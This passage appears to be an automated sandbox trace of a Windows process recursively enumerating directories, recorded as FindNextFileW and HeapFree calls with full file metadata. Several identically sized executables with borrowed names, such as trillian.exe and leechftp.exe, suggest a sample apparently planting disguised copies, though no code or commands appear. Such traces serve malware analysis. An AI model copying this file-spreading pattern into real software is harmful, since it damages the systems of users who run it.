ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0172.606] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0172.607] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.607] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0172.607] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.607] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0172.607] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.607] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0172.607] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.607] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0172.607] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.607] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0172.608] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.609] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 0 [0172.609] FindClose (in: hFindFile=0x801ed8 | out: hFindFile=0x801ed8) returned 1 [0172.609] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.609] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0172.609] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.609] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0172.610] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.610] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0172.611] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.611] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0172.611] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.611] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0172.611] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.611] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0172.612] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.612] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0172.612] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.612] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0172.612] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.612] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0172.613] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.614] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4426d40, ftCreationTime.dwHighDateTime=0x1d584c5, ftLastAccessTime.dwLowDateTime=0x5408d750, ftLastAccessTime.dwHighDateTime=0x1d59267, ftLastWriteTime.dwLowDateTime=0x5408d750, ftLastWriteTime.dwHighDateTime=0x1d59267, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="trillian.exe", cAlternateFileName="")) returned 1 [0172.614] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0172.614] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x240000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0172.615] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.615] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0172.615] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.615] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec4f8a0, ftCreationTime.dwHighDateTime=0x1d59c3a, ftLastAccessTime.dwLowDateTime=0x1bbea800, ftLastAccessTime.dwHighDateTime=0x1d5be92, ftLastWriteTime.dwLowDateTime=0x1bbea800, ftLastWriteTime.dwHighDateTime=0x1d5be92, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="leechftp.exe", cAlternateFileName="")) returned 1 [0172.616] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.616] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0172.616] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.616] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xea796993, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea796993, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Java", cAlternateFileName="")) returned 1 [0172.783] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.783] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0172.793] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.793] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0172.794] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.794] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0172.796] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0172.796] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0172.802] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.803] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0172.803] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.803] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0172.805] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.805] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0172.809] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.809] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0172.813] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.813] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0172.816] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.816] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0172.821] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0172.821] FindNextFileW (in: hFindFile=0x802218, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0172.821] FindClose (in: hFindFile=0x802218 | out: hFindFile=0x802218) returned 1 [0172.821] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.821] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0172.822] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0172.822] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0172.827] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0172.827] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0173.087] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0173.087] FindNextFileW (in: hFindFile=0x802198, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0173.087] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0173.087] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0173.087] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0173.089] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5896b9f0, ftCreationTime.dwHighDateTime=0x1d5acec, ftLastAccessTime.dwLowDateTime=0x13ae3ae0, ftLastAccessTime.dwHighDateTime=0x1d5c626, ftLastWriteTime.dwLowDateTime=0x13ae3ae0, ftLastWriteTime.dwHighDateTime=0x1d5c626, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="modules_recommend.exe", cAlternateFileName="MODULE~1.EXE")) returned 1 [0173.090] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0173.090] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, 